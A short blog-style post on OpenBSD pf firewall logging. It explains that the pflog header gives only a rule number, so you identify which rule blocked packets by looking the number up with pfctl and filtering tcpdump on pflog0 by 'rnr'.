Assuming that you're watching live, the way you do this is to find the rule number with 'pfctl -vv -s rules | grep @ | grep <term>' for a suitable term, such as the table name (or look through the whole thing with a pager), and then run 'tcpdump -n -i pflog0 "rnr <number>"'. However, looking up rule numbers is annoying and a clever person might remember that the OpenBSD tcpdump can print the pf rule information for pflog packets, through the '-e' option (for pflog, this is considered the link-level header). So you might think that the easy way to achieve what you want is 'tcpdump -n -i pflog0 | grep <term>', which is to say you're dumping all pflog packets and then picking out the ones that matched your rule.

Unfortunately, the pflog 'link-level header' doesn't actually tell you this. What it has is the rule number, whether the packet was blocked or not (you can log without blocking), which direction the block was (in or out), and what interface (plus that the packet was blocked because it matched a rule):

21:20:43.525222 rule 231/(match) block in on ix1: [...]

Quite sensibly, you don't get the actual contents of the rule that blocked the packet, so you can't grep for it and my clever idea was not so clever. If you read all the way to the Link Level Headers section of the OpenBSD tcpdump manual page, it explicitly tells you this:

On the packet filter logging interface pflog(4), logging reason (rule match, bad-offset, fragment, bad-timestamp, short, normalize, memory), action taken (pass/block), direction (in/out) and interface information are printed out for each packet.

So don't be like me and waste your time with the 'grep the tcpdump output' approach. It isn't going to work and you're going to have to do it the hard way.

As far as I know there's no way to attach some sort of marker to rules in your pf.conf that will make them easy to pick out in pflog(4) packets. Based on the pflog(4) manual page, the packet format just doesn't have room for that. If you absolutely need to know this sort of thing for sure, even over rule changes, I think your only option is to log the packets to a non-default pflog(4) interface and then arrange for something to receive and store stuff from that interface.

❌